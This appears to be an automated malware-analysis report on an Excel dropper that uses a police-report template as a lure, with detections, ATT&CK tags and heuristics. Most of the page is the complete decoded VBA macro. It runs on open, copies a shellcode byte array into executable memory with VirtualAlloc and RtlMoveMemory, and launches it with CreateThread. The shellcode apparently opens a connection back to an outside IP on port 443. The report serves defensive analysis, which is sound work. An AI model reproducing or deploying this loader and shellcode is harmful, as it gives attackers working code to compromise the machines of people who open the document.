MALICIOUS
124
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an Excel document containing VBA macros, including AutoOpen and Workbook_Open, which are commonly used to execute malicious code upon opening. The presence of VirtualAlloc API calls and the ClamAV detection signature 'Doc.Dropper.Valyria-6680543-0' strongly indicate that this file is a dropper designed to download and execute a second-stage payload. The document body content appears to be a template for a police report, which is likely a lure to trick the user into opening the malicious file.
Heuristics 6
-
ClamAV: Doc.Dropper.Valyria-6680543-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Valyria-6680543-0
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Sub Sub AutoOpen() Auto_Open -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Sub Sub Workbook_Open() Auto_Open -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() Dim Mtcscgzk As Long, Xtzmjg As Variant, Nvazs As Long
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4259 bytes |
SHA-256: ae526672d3e70c046872b5955c7ab85c07598ec7ea02a67f46ae55ccec6477a2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Cydb As Long, ByVal Hepkak As Long, ByVal Ukg As LongPtr, Ctugrb As Long, ByVal Jzaquxz As Long, Wrvtvyt As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Rypyb As Long, ByVal Phd As Long, ByVal Bww As Long, ByVal Chmhdjx As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Nim As LongPtr, ByRef Hie As Any, ByVal Shfbdksx As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Cydb As Long, ByVal Hepkak As Long, ByVal Ukg As Long, Ctugrb As Long, ByVal Jzaquxz As Long, Wrvtvyt As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Rypyb As Long, ByVal Phd As Long, ByVal Bww As Long, ByVal Chmhdjx As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Nim As Long, ByRef Hie As Any, ByVal Shfbdksx As Long) As Long
#End If
Sub Auto_Open()
Dim Mtcscgzk As Long, Xtzmjg As Variant, Nvazs As Long
#If VBA7 Then
Dim Llrkwbn As LongPtr, Kdsfhawzj As LongPtr
#Else
Dim Llrkwbn As Long, Kdsfhawzj As Long
#End If
Xtzmjg = Array(232, 130, 0, 0, 0, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 226, 242, 82, 87, 139, 82, 16, 139, 74, 60, 139, 76, 17, 120, 227, 72, 1, 209, 81, 139, 89, 32, 1, 211, 139, 73, 24, 227, 58, 73, 139, 52, 139, 1, 214, 49, 255, 172, 193, _
207, 13, 1, 199, 56, 224, 117, 246, 3, 125, 248, 59, 125, 36, 117, 228, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 95, 95, 90, 139, 18, 235, 141, 93, 104, 51, 50, 0, 0, 104, 119, 115, 50, 95, 84, 104, 76, 119, 38, 7, 255, 213, 184, 144, 1, 0, 0, 41, _
196, 84, 80, 104, 41, 128, 107, 0, 255, 213, 106, 10, 104, 172, 16, 59, 140, 104, 2, 0, 1, 187, 137, 230, 80, 80, 80, 80, 64, 80, 64, 80, 104, 234, 15, 223, 224, 255, 213, 151, 106, 16, 86, 87, 104, 153, 165, 116, 97, 255, 213, 133, 192, 116, 10, 255, 78, 8, 117, 236, 232, 97, 0, 0, 0, 106, 0, 106, 4, 86, 87, 104, 2, 217, 200, 95, 255, 213, 131, 248, _
0, 126, 54, 139, 54, 106, 64, 104, 0, 16, 0, 0, 86, 106, 0, 104, 88, 164, 83, 229, 255, 213, 147, 83, 106, 0, 86, 83, 87, 104, 2, 217, 200, 95, 255, 213, 131, 248, 0, 125, 34, 88, 104, 0, 64, 0, 0, 106, 0, 80, 104, 11, 47, 15, 48, 255, 213, 87, 104, 117, 110, 77, 97, 255, 213, 94, 94, 255, 12, 36, 233, 113, 255, 255, 255, 1, 195, 41, 198, 117, _
199, 195, 187, 240, 181, 162, 86, 106, 0, 83, 255, 213)
Llrkwbn = VirtualAlloc(0, UBound(Xtzmjg), &H1000, &H40)
For Nvazs = LBound(Xtzmjg) To UBound(Xtzmjg)
Mtcscgzk = Xtzmjg(Nvazs)
Kdsfhawzj = RtlMoveMemory(Llrkwbn + Nvazs, Mtcscgzk, 1)
Next Nvazs
Kdsfhawzj = CreateThread(0, 0, Llrkwbn, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hoja3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.